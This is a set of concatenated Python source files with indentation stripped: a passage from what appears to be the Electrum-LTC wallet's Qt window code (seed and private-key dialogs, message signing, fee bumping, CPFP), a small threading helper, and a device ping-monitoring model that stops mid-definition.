wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(QLabel(_('Lightning')), 5, 0)
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Litecoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_ltc.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum_ltc import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("litecoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_ltc import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-ltc-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
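# Runs in a background thread; progress and results are pushed to the GUI thread
# via the computing_privkeys / show_privkeys signals.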
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
scriptpubkey = bfh(bitcoin.address_to_script(addr))
outputs = [PartialTxOutput(scriptpubkey=scriptpubkey, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
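# The child pays the difference between the target combined fee (fee_per_kb * total_size / 1000)
# and the parent's fee, capped at the child's input amount and floored at 1 sat/byte of the combined size.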
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
threading.py
|
import threading
class Threader():
__author__ = "Lloyd Albin (lalbin@fredhutch.org, lloyd@thealbins.com)"
__version__ = "0.0.23"
__copyright__ = "Copyright (C) 2019 Fred Hutchinson Cancer Research Center"
from scharp_py_tools import scharp_logging
logger = scharp_logging.Logger()
MAX_THREADS = 0  # 0 means do not spawn worker threads; calls run synchronously in spawn_thread()
main_thread = threading.main_thread()
def spawn_thread(self, methodName, *args, **kwargs):
self.logger.debug('Testing Process')
if self.MAX_THREADS == 0:
methodName(*args, **kwargs)
else:
reuse_thread = False
self.logger.debug('Active Threads: %s', threading.active_count())
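# Busy-wait until the number of active threads is within MAX_THREADS, then hand the call to a new worker thread.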
while not reuse_thread:
if threading.active_count() <= self.MAX_THREADS:
self.logger.debug('start new worker thread')
t = threading.Thread(target=methodName, args=args, kwargs=kwargs)
t.start()
reuse_thread = True
def wait_for_all_threads(self):
for t in threading.enumerate():
if t is self.main_thread:
continue
self.logger.debug('joining %s', t.name)
self.logger.debug('Active Threads: %s', threading.active_count())
t.join()
|
multi_ping_model.py
|
"""Continuously pings devices for troubleshooting"""
from pydispatch import dispatcher
from threading import Thread
import datetime
import os
import csv
from . import win_ping
class PingUnit:
def __init__(self, obj, path, logging=False):
self.obj = obj
self.ping_data = []
self.hostname = obj.hostname
self.serial = obj.serial
self.ip_address = obj.ip_address
self.mac_address = obj.mac_address
self.success = 0
self.failed = 0
self.path = path
self.logging = logging
self.log = f'device_{obj.ip_address}_time_{datetime.datetime.now().strftime("%H_%M_%S")}.csv'
dispatcher.connect(
self.on_incoming_ping,
signal="Incoming Ping",
sender=dispatcher.Any)
self.thread = self.start_thread(obj)
def on_incoming_ping(self, sender, data):
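# Expected payload (inferred from set_ping_data and win_ping): data[0] is the device object,
# data[1] is (ping_time, ms_delay, success) where success is the string 'Yes' or 'No'.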
if data[0] == self.obj:
self.ping_data.append(self.set_ping_data(data[1]))
if data[1][2] == 'Yes':
self.success += 1
else:
self.failed += 1
if self.logging:
self.save_log()
def set_ping_data(self, ping_info):
"""Makes a ping data unit"""
return Ping_Data_Unit(
ping_info[0], # .strftime('%H:%M:%S.%f')
ping_info[1],
ping_info[2])
def save_log(self):
"""Save log to a file"""
log_path = os.path.join(self.path, 'ping_logs')
if not os.path.exists(log_path):
os.makedirs(log_path)
output_file = os.path.join(log_path, self.log)
with open(output_file, 'a') as log_file:
writer_csv = csv.writer(log_file, quoting=csv.QUOTE_ALL)
row = []
row.append(str(self.ping_data[-1].ping_time))
row.append(str(self.ping_data[-1].ms_delay))
row.append(str(self.ping_data[-1].success))
writer_csv.writerow(row)
def start_thread(self, obj):
"""Starts pinging ip_address"""
ping_thread = win_ping.WinPing(obj)
ping_thread.daemon = True
ping_thread.start()
return ping_thread
def stop_thread(self):
self.thread.shutdown = True
self.thread.join()
class Ping_Data_Unit:
def __init__(self, ping_time, ms_delay, success):
self.ping_time = ping_time
self.ms_delay = ms_delay
self.success = success
class MultiPing_Model:
def __init__(self, path='.'):
self.path = path
self.ping_objects = []
self.logging = False
def add(self, device_list):
"""Adds an obj to be pinged"""
current_ip_addresses = []
for obj in self.ping_objects:
current_ip_addresses.append(obj.ip_address)
for obj in device_list:
# print 'compare: ', obj.ip_address, current_ip_addresses
if obj.ip_address not in current_ip_addresses:
new_obj = PingUnit(obj, self.path, self.logging)
self.ping_objects.append(new_obj)
dispatcher.send(signal='Ping Model Update',
sender=self.ping_objects)
# def add_items(self, device_list):
# """Adds new devices to the list"""
# self.clean_up()
# current_ip_addresses = []
# for obj in self.ping_objects:
# current_ip_addresses.append(obj.ip_address)
# for obj in device_list:
# # print 'compare: ', obj.ip_address, current_ip_addresses
# if obj.ip_address not in current_ip_addresses:
# new_obj = PingUnit(obj, self.path, self.logging)
# self.ping_objects.append(new_obj)
# dispatcher.send(signal='Ping Model Update',
# sender=self.ping_objects)
# def clean_up(self):
# for obj in self.ping_objects:
# if not obj.thread.isAlive():
# try:
# self.ping_objects.remove(obj)
# except:
# pass
def delete(self, item):
